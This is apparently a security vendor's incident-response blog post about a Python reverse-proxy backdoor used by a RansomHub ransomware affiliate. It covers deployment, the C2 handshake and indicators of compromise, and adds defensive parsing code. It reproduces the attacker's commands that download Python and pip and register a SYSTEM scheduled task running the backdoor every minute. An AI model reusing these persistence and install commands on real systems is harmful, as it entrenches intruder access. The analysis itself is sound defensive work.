RansomHub Affiliate leverages Python-based backdoor
In an incident response in Q4 of 2024, GuidePoint Security identified evidence of a threat actor utilizing a Python-based backdoor to maintain access to compromised endpoints. The threat actor later leveraged this access to deploy RansomHub encryptors throughout the entire impacted network. ReliaQuest documented an earlier version of this malware on their website in February 2024.
GuidePoint identified a few notable distinctions in the most recent version of the Python backdoor, including:
· Use of obfuscation from PyObfuscate[.]com
· Deployment via Remote Desktop Protocol (RDP) lateral movement
· Unique indicators of compromise, including filenames, scheduled task names, C2 addresses
While analyzing this malware, GuidePoint has identified 18 IP addresses associated with the C2 infrastructure of the Python backdoor. In collaboration with @drb_ra, we will post these IP addresses as “Ransomhub Python C2” in GitHub – drb-ra/C2IntelFeeds: Automatically created C2 Feeds.
Malware Deployment
Like ReliaQuest, GuidePoint identified evidence linking SocGholish (FakeUpdate) to the initial access phase of the incident. In the incident GuidePoint investigated, the Python backdoor was dropped roughly 20 minutes after the initial infection. Subsequently, the threat actor dropped Python backdoors on additional systems during lateral movement via RDP sessions.
The threat actor performed the following five steps to install Python and entrench the backdoor on all impacted systems:
- Move to the designated target folder:
  cd c:\users\<redacted>\appdata\local\connecteddevicesplatform;
- Install Python:
  wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip
- Set up pip and install the required Python libraries:
  wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz;.\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location;
- Create the Python proxy script:
  C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip\get-pip2.pyd
- Establish persistence with a Windows scheduled task:
  powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system'
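A defender-side check for the persistence created in the last step, added here as an example and not GuidePoint's own tooling: it parses an exported Task Scheduler XML definition and lists the traits worth flagging. The sample XML is constructed to mirror the Register-ScheduledTask call above, with `victim` standing in for the redacted username.

```python
"""Flag the pythonw.exe scheduled-task persistence pattern in exported task XML."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample, roughly what Export-ScheduledTask emits for the task above.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2024-11-01T10:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Settings><ExecutionTimeLimit>PT0S</ExecutionTimeLimit></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>pythonw.exe</Command>
      <Arguments>get-pip2.pyd</Arguments>
      <WorkingDirectory>C:\Users\victim\AppData\Local\ConnectedDevicesPlatform\get-pip</WorkingDirectory>
    </Exec>
  </Actions>
</Task>"""


def task_findings(task_xml: str) -> list:
    """Return the suspicious traits found in one exported task definition."""
    root = ET.fromstring(task_xml)
    findings = []
    for action in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (action.findtext("t:Command", "", NS) or "").strip().lower()
        args = (action.findtext("t:Arguments", "", NS) or "").strip().lower()
        wdir = (action.findtext("t:WorkingDirectory", "", NS) or "").strip().lower()
        if not cmd.endswith(("pythonw.exe", "python.exe")):
            continue
        findings.append(f"python interpreter as task action: {cmd}")
        if "\\appdata\\local\\" in wdir:
            findings.append("interpreter launched from a per-user AppData directory")
        if args.endswith(".pyd"):
            # A .pyd normally names a compiled extension module, not a script.
            findings.append(".pyd passed as the script argument")
    if root.findtext(".//t:Repetition/t:Interval", "", NS) == "PT1M":
        findings.append("one-minute repetition trigger")
    if root.findtext(".//t:Settings/t:ExecutionTimeLimit", "", NS) == "PT0S":
        findings.append("no execution time limit")
    if root.findtext(".//t:Principal/t:UserId", "", NS) == "S-1-5-18":
        findings.append("runs as SYSTEM")
    return findings
```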
GuidePoint observed no significant differences between the deployment process on the initial system impacted by SocGholish and the subsequent systems affected. Given this new information, it seems more likely that the Python backdoor is a second-stage payload maintained separately and distributed via SocGholish, rather than a Python-based module.
Analysis of the Python Script
Functionally, the script is a reverse proxy that connects to a hardcoded IP address. Once the script has passed the initial command-and-control (C2) handshake, it establishes a tunnel that is heavily based on the SOCKS5 protocol. This tunnel allows the threat actor to move laterally in the compromised network using the victim system as a proxy.
While researching this Python malware, we identified another version with a different C2 address, uploaded to VirusTotal on September 6, 2024. This sample has zero detections on VirusTotal at the time of this blog post.
Obfuscation and Coding Style
The Python script itself has undergone some surface-level changes but remains functionally the same as its previous counterpart, which was first seen on VirusTotal on December 6, 2023. Most of the changes are due to the obfuscation used to avoid detection, likely a modified version from the site PyObfuscate[.]com.
Once fully de-obfuscated, the Python code is extremely polished and well-written. The coding style suggests that the programmer is either meticulous about writing highly readable and testable Python code or is using AI-assisted code creation. With the exception of local variable obfuscation, the code is broken down into distinct classes with highly descriptive method names and variables. Each method also has a high degree of error handling and verbose debug messages. Based on our experience and research online, this level of consistency aligns with patterns often observed in AI-generated code.
Command-and-Control
While the previous version of the script passed the IP address and destination port as an argument, the obfuscated versions have these variables hardcoded in the default value, as seen in Figure 2.
Upon execution, the script attempts the following three C2 steps:
- Create a TCP socket and establish a connection to the hardcoded IP address, then idle until receiving two non-null bytes.
- Establish a new TCP connection to the C2 address using the value of the previous two bytes as the new destination port.
- Create a SOCKS5-like tunnel through the new TCP connection.
Once the second connection is established, the compromised system acts as a proxy to the threat actor's C2 address. Notably, the versions of the script we have obtained only support TCP tunneled traffic and do not support IPv6 addresses. Figure 3 contains detailed logging for unsupported address types and command codes. The expected values are consistent with the SOCKS5 network protocol despite not being fully implemented. Interestingly, the author, or likely an AI, included logging for the unimplemented sections.
Network traffic collected while analyzing the malware corroborates the analysis of the Python code. While using a live C2 as a target, the script successfully connected and received two bytes in its initial connection. After receiving numerous instances of null bytes, the C2 server finally responded with non-null bytes 22 2A.
The two bytes 22 2A, read as a little-endian 16-bit value (0x2A22), correspond to the decimal value 10786. As expected, the next connection we observed from the system running the Python backdoor was on this destination port, shown in Figure 5.
The TCP stream associated with the second session corroborates the use of a SOCKS5-like tunnel. Figure 6 shows the TCP stream of the second session containing a tunneled HTTP request and response. The hex string outlined in orange corresponds to the target address, and the value outlined in purple corresponds to the destination port. For this session, the target address corresponds to a Google IP address, 142.250.68.110, and the destination port is 80.
Figure 7 contains both the tunneled C2 traffic and the proxied HTTP traffic to the Google IP address in a pattern consistent with proxied traffic.
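The C2 exchange above, decoded from captured bytes as an added example (not the malware's code): `staging_port` reads the two-byte stage-1 reply the way the page describes, and `parse_connect` pulls the target address and port out of the first request on the second connection. It assumes the request follows the RFC 1928 CONNECT layout; the page only calls the tunnel SOCKS5-like, so confirm the framing against Figure 6 before relying on it. The sample bytes are constructed to match the values in the text.

```python
"""Decode the two-stage C2 exchange: staging port, then SOCKS5-style CONNECT."""
import ipaddress
import struct
from typing import Optional

SOCKS_CMD = {1: "CONNECT", 2: "BIND", 3: "UDP ASSOCIATE"}
SOCKS_ATYP = {1: "IPv4", 3: "DOMAIN", 4: "IPv6"}

# Constructed samples: the observed stage-1 reply and a CONNECT to 142.250.68.110:80.
SAMPLE_STAGE1_REPLY = b"\x22\x2a"
SAMPLE_CONNECT = (b"\x05\x01\x00\x01" + bytes([142, 250, 68, 110]) + b"\x00\x50"
                  + b"GET / HTTP/1.1\r\nHost: 142.250.68.110\r\n\r\n")


def staging_port(reply: bytes) -> Optional[int]:
    """Stage 1: the backdoor idles until two non-null bytes arrive, then reads
    them little-endian (not network byte order) as the port for connection two."""
    if len(reply) != 2 or b"\x00" in reply:
        return None  # null padding from the C2: keep waiting
    return struct.unpack("<H", reply)[0]


def parse_connect(req: bytes) -> dict:
    """Stages 2 and 3: parse the first tunnel request. Non-CONNECT commands and
    non-IPv4 targets are reported as unsupported, matching what the script logs."""
    if len(req) < 4 or req[0] != 5:
        raise ValueError("not a SOCKS5 request header")
    _ver, cmd, _rsv, atyp = req[:4]
    cmd_name = SOCKS_CMD.get(cmd, f"unknown({cmd})")
    atyp_name = SOCKS_ATYP.get(atyp, f"unknown({atyp})")
    if cmd != 1 or atyp != 1:
        return {"supported": False, "command": cmd_name, "address_type": atyp_name}
    if len(req) < 10:
        raise ValueError("truncated IPv4 CONNECT request")
    host = str(ipaddress.IPv4Address(req[4:8]))
    port = struct.unpack("!H", req[8:10])[0]  # SOCKS carries the port big-endian
    return {"supported": True, "command": cmd_name, "address_type": atyp_name,
            "host": host, "port": port, "payload": req[10:]}
```

Running the two functions over the stage-1 reply and the CONNECT bytes from a capture gives the destination port and the proxied target for an incident timeline.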
Key Takeaways
This blog post highlights how ransomware affiliates continue to utilize a Python-based backdoor to maintain persistence and effectively evade security tools. Additionally, it demonstrates how threat actors are potentially adopting AI-assisted code to create and maintain their malware. As noted earlier, GuidePoint has identified additional C2 addresses associated with similar Python backdoors, most of which remain active at the time of this publication. Updates and details on these C2 addresses will be shared via the following feed: GitHub – drb-ra/C2IntelFeeds: Automatically created C2 Feeds.
More information
For any follow-up questions or concerns, please get in touch with GRIT at [email protected]
Additional Indicators of Compromise
Indicator | Detail |
get-pip2.pyd | Python backdoor filename |
get-pip2 | Python backdoor task name |
5089fd6ce6d8c0fca8d9c4af7441ee9198088bfba6e200e27fe30d3bc0c6401c | Python backdoor SHA256 hash |
RansomHub Python C2